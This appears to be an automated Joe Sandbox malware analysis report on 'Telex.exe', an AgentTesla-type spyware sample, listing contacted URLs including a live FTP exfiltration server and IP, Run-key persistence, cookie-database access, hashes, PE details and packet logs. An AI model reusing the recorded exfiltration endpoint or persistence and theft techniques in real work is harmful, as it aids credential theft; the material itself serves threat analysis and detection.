http://FvPNfC.com	mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:HTTP/1.1	Telex.exe, 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://srFPkrrHbWMI0Yhx6.net	Telex.exe, 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.503249049.0000000002C62000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	Telex.exe, 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.org%GETMozilla/5.0	mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://srFPkrrHbWMI0Yhx6.netX	Telex.exe, 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ftp.universalinks.net	Telex.exe, 00000001.00000002.503353247.0000000002C70000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Telex.exe, 00000000.00000002.238539164.0000000002861000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.503249049.0000000002C62000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321163435.00000000026B1000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000014.00000002.327822019.0000000002FC1000.00000004.00000001.sdmp	false		high
https://api.ipify.org%	Telex.exe, 00000001.00000002.502741768.0000000002BCA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	Telex.exe, 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	false		high
ftp://ftp.universalinks.net/bring4	mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.145.239.54	ftp.universalinks.net	United States		22611	IMH-WESTUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	412652
Start date:	12.05.2021
Start time:	20:44:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Telex.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@11/5@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 7.9% (good quality ratio 5.3%) Quality average: 39.3% Quality standard deviation: 32.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 115 Number of non-executed functions: 12
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 20.82.210.154, 52.147.198.201, 92.122.145.220, 23.57.80.111, 20.50.102.62, 92.122.213.194, 92.122.213.247, 2.20.142.209, 2.20.143.16, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, ocsp.msocsp.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, hostedocsp.globalsign.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:45:11	API Interceptor	820x Sleep call for process: Telex.exe modified
20:45:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run mDPTQJF1 C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
20:45:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run mDPTQJF1 C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
20:45:48	API Interceptor	465x Sleep call for process: mDPTQJF1.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
192.145.239.54	eLECTRONIC Flight Ticket Invoice confirmationETKT XXXXX3939 INVOICE 000Z1298932 TKT Payment.exe	Get hash	malicious	Browse
	eLECTRONIC Flight Ticket Confirmation VIS XXXXX3939 INVOICE 000Z1298932 TKT Payment.exe	Get hash	malicious	Browse
	TKT eLECTRONIC Flight Ticket Confirmation VIS XXXXX83939 INVOICE 000Z1298932 TKT.exe	Get hash	malicious	Browse
	Invoice Packing List CORP Invoice R-CONM012 2021-04-26 - large shipment tools (1)2021.04.26.exe	Get hash	malicious	Browse
	Turkistanman OCT order Swift 40 deposit against order PO 277138293.exe	Get hash	malicious	Browse
	ebElectronic Flight Ticket Booking Payment Confirmation XXXX7383929837 Debit BNC9929302.exe	Get hash	malicious	Browse
	eElectronic 4 Flight Ticket Booking Payment Confirmation XXXX7383929837 Debit BNC9929302.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.globalsign.cloud	263a35c3_by_Libranalysis.dll	Get hash	malicious	Browse	104.18.25.243
	POI09876OIUY.exe	Get hash	malicious	Browse	104.18.25.243
	Request Sample products.exe	Get hash	malicious	Browse	104.18.25.243
	6823a552_by_Libranalysis.dll	Get hash	malicious	Browse	104.18.24.243
	3bc8e970_by_Libranalysis.dll	Get hash	malicious	Browse	104.18.25.243
	079c508f_by_Libranalysis.dll	Get hash	malicious	Browse	104.18.25.243
	80df624d_by_Libranalysis.dll	Get hash	malicious	Browse	104.18.24.243
	8333bdd5e1560584a0302e2fe63cf9d81ebe5b48e7e2b.exe	Get hash	malicious	Browse	104.18.24.243
	7b73e459_by_Libranalysis.dll	Get hash	malicious	Browse	104.18.25.243
	lBmH1dux3rkWHAs.exe	Get hash	malicious	Browse	104.18.24.243
	INQUIRY.exe	Get hash	malicious	Browse	104.18.24.243
	0908000000.exe	Get hash	malicious	Browse	104.18.24.243
	urgent request fro quotation CONO GROUP LLC DK983746GT.exe	Get hash	malicious	Browse	104.18.25.243
	un6IVL1qYU.dll	Get hash	malicious	Browse	104.18.25.243
	dVMxk14XPULdlBw.exe	Get hash	malicious	Browse	104.18.25.243
	Purchase Order-1245102021.xls	Get hash	malicious	Browse	104.18.25.243
	SecuriteInfo.com.Trojan.Win32.Save.a.32673.exe	Get hash	malicious	Browse	104.18.25.243
	13629175_by_Libranalysis.dll	Get hash	malicious	Browse	104.18.25.243
	c681a5e2_by_Libranalysis.dll	Get hash	malicious	Browse	104.18.24.243
	CMjsfg603M.exe	Get hash	malicious	Browse	104.18.25.243
ftp.universalinks.net	eLECTRONIC Flight Ticket Invoice confirmationETKT XXXXX3939 INVOICE 000Z1298932 TKT Payment.exe	Get hash	malicious	Browse	192.145.239.54
	eLECTRONIC Flight Ticket Confirmation VIS XXXXX3939 INVOICE 000Z1298932 TKT Payment.exe	Get hash	malicious	Browse	192.145.239.54
	TKT eLECTRONIC Flight Ticket Confirmation VIS XXXXX83939 INVOICE 000Z1298932 TKT.exe	Get hash	malicious	Browse	192.145.239.54
	Invoice Packing List CORP Invoice R-CONM012 2021-04-26 - large shipment tools (1)2021.04.26.exe	Get hash	malicious	Browse	192.145.239.54
	Turkistanman OCT order Swift 40 deposit against order PO 277138293.exe	Get hash	malicious	Browse	192.145.239.54
	ebElectronic Flight Ticket Booking Payment Confirmation XXXX7383929837 Debit BNC9929302.exe	Get hash	malicious	Browse	192.145.239.54
	eElectronic 4 Flight Ticket Booking Payment Confirmation XXXX7383929837 Debit BNC9929302.exe	Get hash	malicious	Browse	192.145.239.54

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IMH-WESTUS	PO 367628usa.exe	Get hash	malicious	Browse	209.182.202.96
	eLECTRONIC Flight Ticket Invoice confirmationETKT XXXXX3939 INVOICE 000Z1298932 TKT Payment.exe	Get hash	malicious	Browse	192.145.239.54
	eLECTRONIC Flight Ticket Confirmation VIS XXXXX3939 INVOICE 000Z1298932 TKT Payment.exe	Get hash	malicious	Browse	192.145.239.54
	scan of document 5336227.xlsm	Get hash	malicious	Browse	192.249.126.181
	scan of invoice 91510.xlsm	Get hash	malicious	Browse	192.249.126.181
	scan of bill 0905.xlsm	Get hash	malicious	Browse	192.249.126.181
	PO9448882.exe	Get hash	malicious	Browse	209.182.202.96
	check 6746422.xlsm	Get hash	malicious	Browse	192.249.126.181
	TKT eLECTRONIC Flight Ticket Confirmation VIS XXXXX83939 INVOICE 000Z1298932 TKT.exe	Get hash	malicious	Browse	192.145.239.54
	proforma invoice.exe	Get hash	malicious	Browse	192.249.124.39
	SOA.exe	Get hash	malicious	Browse	173.231.198.30
	Invoice Packing List CORP Invoice R-CONM012 2021-04-26 - large shipment tools (1)2021.04.26.exe	Get hash	malicious	Browse	192.145.239.54
	SecuriteInfo.com.Heur.32597.xls	Get hash	malicious	Browse	144.208.70.30
	SecuriteInfo.com.Heur.32597.xls	Get hash	malicious	Browse	144.208.70.30
	SecuriteInfo.com.Heur.31681.xls	Get hash	malicious	Browse	144.208.70.30
	Email - Payment Report.html	Get hash	malicious	Browse	23.235.214.102
	PO472020.xlt	Get hash	malicious	Browse	199.250.214.202
	PO472020.xlt	Get hash	malicious	Browse	199.250.214.202
	PO472020.xlt	Get hash	malicious	Browse	199.250.214.202
	SecuriteInfo.com.Exploit.Siggen3.16583.277.xls	Get hash	malicious	Browse	199.250.214.202

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Telex.exe.log Download File
Process:	C:\Users\user\Desktop\Telex.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mDPTQJF1.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe Download File
Process:	C:\Users\user\Desktop\Telex.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	879616
Entropy (8bit):	7.385079919018695
Encrypted:	false
SSDEEP:	12288:ARhATChEI0rx5K8LeU8NA+tTTqcDaGZSxMpC4azefqBqTHzz8dwhbrx6qQMjvLey:A0xsIeU8i+l9aGZ2M5biBqTSIbRvLey
MD5:	01FE9288B37BDEB3684DB4BD497685E2
SHA1:	083282559E805CEF41F6C869D12BCA814B72DCD6
SHA-256:	EC9C7ECEABE73740FEFB573D42BC06A3C7E65173F2C7C3030CBB50EDD8E3BA17
SHA-512:	CB697AA9D7E37A98B90BE71706987B2830D71C06AB823555BC620C64F36F27C8299ACF7E6AC346B3E33B17FA2C6B307983725610DEAD585C19E15305C54677AC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..`..............P.............B.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...H.... ...................... ..`.rsrc...............................@..@.reloc...............j..............@..B................$.......H...........H...........@................................................0............( ...(!.........(.....o".........................(#......($......(%......(&......('....N..(....oS...((....&..().....s........s+........s,........s-........s.............0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0...........~....o2....+...0...........~....o3....+...0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....+...0......

C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\Telex.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\vkq1voel.sze\Chrome\Default\Cookies Download File
Process:	C:\Users\user\Desktop\Telex.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	modified
Size (bytes):	20480
Entropy (8bit):	0.698304057893793
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
MD5:	3806E8153A55C1A2DA0B09461A9C882A
SHA1:	BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
SHA-256:	366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
SHA-512:	31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.385079919018695
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Telex.exe
File size:	879616
MD5:	01fe9288b37bdeb3684db4bd497685e2
SHA1:	083282559e805cef41f6c869d12bca814b72dcd6
SHA256:	ec9c7eceabe73740fefb573d42bc06a3c7e65173f2c7c3030cbb50edd8e3ba17
SHA512:	cb697aa9d7e37a98b90be71706987b2830d71c06ab823555bc620c64f36f27c8299acf7e6ac346b3e33b17fa2c6b307983725610dead585c19e15305c54677ac
SSDEEP:	12288:ARhATChEI0rx5K8LeU8NA+tTTqcDaGZSxMpC4azefqBqTHzz8dwhbrx6qQMjvLey:A0xsIeU8i+l9aGZ2M5biBqTSIbRvLey
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..`..............P.............B.... ........@.. ....................................@................................

File Icon


Icon Hash:	d28ab3b0e0ab96c4

Static PE Info

General
Entrypoint:	0x4afc42
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x609BFE26 [Wed May 12 16:11:18 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xafbf0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0x28894	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xda000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xadc48	0xade00	False	0.803486981039	data	7.63584673594	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0x28894	0x28a00	False	0.347848557692	data	5.40026670991	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xda000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xb0280	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0xc0aa8	0x94a8	data
RT_ICON	0xc9f50	0x5488	data
RT_ICON	0xcf3d8	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
RT_ICON	0xd3600	0x25a8	data
RT_ICON	0xd5ba8	0x10a8	data
RT_ICON	0xd6c50	0x988	data
RT_ICON	0xd75d8	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0xd7a40	0x76	data
RT_VERSION	0xd7ab8	0x3ac	data
RT_MANIFEST	0xd7e64	0xa2e	XML 1.0 document, UTF-8 Unicode (with BOM) text

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2020
Assembly Version	1.0.0.0
InternalName	InvalidFilterCriteriaException.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	LibraryManagementSystem
ProductVersion	1.0.0.0
FileDescription	LibraryManagementSystem
OriginalFilename	InvalidFilterCriteriaException.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/12/21-20:46:53.574423	TCP	2029927	ET TROJAN AgentTesla Exfil via FTP	49728	21	192.168.2.5	192.145.239.54
05/12/21-20:46:53.777683	TCP	2029928	ET TROJAN AgentTesla HTML System Info Report Exfil via FTP	49729	31991	192.168.2.5	192.145.239.54

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 20:46:51.751831055 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:51.948355913 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:51.948530912 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:52.148454905 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:52.150908947 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:52.347384930 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:52.347407103 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:52.348239899 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:52.571746111 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:52.572772026 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:52.769409895 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:52.773770094 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:52.970360041 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:52.975579023 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:53.172095060 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:53.172394037 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:53.368855000 CEST	21	49728	192.145.239.54	192.168.2.5
May 12, 2021 20:46:53.374205112 CEST	49729	31991	192.168.2.5	192.145.239.54
May 12, 2021 20:46:53.409179926 CEST	49728	21	192.168.2.5	192.145.239.54
May 12, 2021 20:46:53.574002028 CEST	31991	49729	192.145.239.54	192.168.2.5
May 12, 2021 20:46:53.574112892 CEST	49729	31991	192.168.2.5	192.145.239.54
